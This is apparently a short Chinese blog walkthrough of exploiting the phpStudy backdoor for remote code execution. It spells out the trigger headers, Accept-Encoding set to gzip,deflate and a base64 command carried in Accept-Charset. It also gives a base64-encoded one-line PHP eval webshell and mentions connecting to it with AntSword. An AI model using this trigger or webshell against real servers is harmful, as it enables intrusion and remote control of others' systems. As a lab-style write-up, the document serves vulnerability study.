市面上的PHP集成环境很多,没有最好的,只有更适用的。 Phpstudy是一款PHP调试环境的程序集成包,集成了最新的某公司、PHP、phpMy**。
phpStudy软件集成了最新的某公司、PHP、MySQL、phpMy**、ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。并且phpstudy绿色小巧简易迷你仅有35M,有专门的控制面板。对于php新手来说,使用phpstudy配置windows环境可以达到省时省力的效果。ZendOptimizer等多款软件一次性安装,无需配置,即装即用。Phpstudy+框架存在后门,可进行RCE。
1.访问环境 2.通过信息收集,获取重要入口 指纹信息:PHP环境
目录信息:phpinfo.php
3.发现使用PHP study框架,尝试POC验证
4.漏洞存在,尝试getshell 提取关键信息 Accept-Encoding:gzip,deflate Accept-Charset:base64编码执行的命令 一句话木马: ZXZhbCgkX1BPU1RbeXVuenVpXSk7 密码:***
5.直接就上蚁剑
这种不落地的webshell,在安全监测过程中很难发现!从而也更好的说明了安全本质就是不断对抗....... |